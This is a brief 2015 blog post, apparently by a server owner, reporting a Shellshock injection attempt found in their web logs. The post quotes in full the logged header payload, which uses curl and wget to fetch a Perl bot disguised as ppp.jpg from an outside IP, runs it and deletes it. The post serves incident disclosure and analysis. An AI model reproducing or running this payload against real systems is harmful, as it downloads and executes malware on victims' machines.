Mittwoch, 15. April 2015

ppp.jpg (perl based malware) Addbot

On the 07th of April a shellcode injection attempt hit my system.
Target was to download and execute perl based malware.
46.4.73.171 - - [07/Apr/2015:03:54:15 +0200] "GET / HTTP/1.1" 404 442 "() { :;}; /bin/bash -c \"echo 109.234.106.8/ ;cd /tmp;curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg; echo 109.234.106.8/ ;cd /var/spool/samba; curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg\"" "() { :;}; /bin/bash -c \"echo 109.234.106.8/ ;cd /tmp;curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg; echo 109.234.106.8/ ;cd /var/spool/samba; curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg\""
The ppp.jpg file is actually a perl script.
Driven by my basic knowledge on perl I would assume that it is a irc controlled bot used to access google and other search engines to ensure a better page ranking.

For more details please visit Virustotal